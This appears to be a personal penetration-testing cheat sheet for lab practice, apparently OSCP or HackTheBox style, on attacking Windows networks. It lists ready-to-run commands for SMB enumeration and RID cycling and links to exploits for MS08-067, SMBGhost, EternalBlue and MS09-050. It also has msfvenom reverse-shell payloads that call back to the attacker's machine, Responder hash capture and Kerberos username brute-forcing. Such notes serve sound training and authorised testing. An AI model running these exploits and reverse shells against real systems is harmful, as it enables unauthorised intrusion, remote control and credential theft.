# Active

## Windows
### SMB
* check null sessions
#### RID cycling
`lookupsid.py guest:@192.168.240.172` -> RID cycling

#### Exploits
- check wich exploit is available
`nmap -p 139,445 --script 'smb-vuln*' $IP`


Running Windows XP -> MS08-067 vulnerable -> exploit 40279 from exploit-db (oscp alice)
https://www.exploit-db.com/exploits/40279

Running Windows 10 (security patch released in March 2020) -> CVE-2020-0796
https://github.com/danigargu/CVE-2020-0796
replace shellcode in exploit.cpp (line 204)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$(iptun) LPORT=8081 -f dll -f csharp


SMBv1 -> ms17-010
https://github.com/3ndG4me/AutoBlue-MS17-010


-→ SMB Remote Code Execution (MS17-010)
https://0xdf.gitlab.io/2021/05/11/htb-blue.html
https://github.com/worawit/MS17-010
https://github.com/helviojunior/MS17-010

git clone https://github.com/helviojunior/MS17-010; cd MS17-010
msfvenom -p windows/shell_reverse_tcp -f exe EXITFUNC=thread LHOST=$(iptun) LPORT=445 -o rev.exe
python2 send_and_execute.py $IP rev.exe



- SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) MS09_050
python2 -m pip install pysmb
searchsploit -m 40280.py
msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=443  EXITFUNC=thread  -f python

A major pain to do without msfconsole...
exploit(windows/smb/ms09_050_smb2_negotiate_func_index)

### DNS Poisoning
intercept hashes with Responder -> can also enum with incomming connections
`sudo python Responder.py -I tun0 --lm`

### Kerberos
#### Kerbrute
`kerbrute_linux_amd64 userenum -d DANTE.local /opt/SecLists/Usernames/xato-net-10-million-usernames.txt --dc 172.16.1.20 --output recon/kerbrute-usernames`